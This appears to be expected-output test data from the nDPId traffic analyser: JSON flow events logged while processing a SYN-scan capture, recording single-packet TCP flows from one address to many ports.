+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
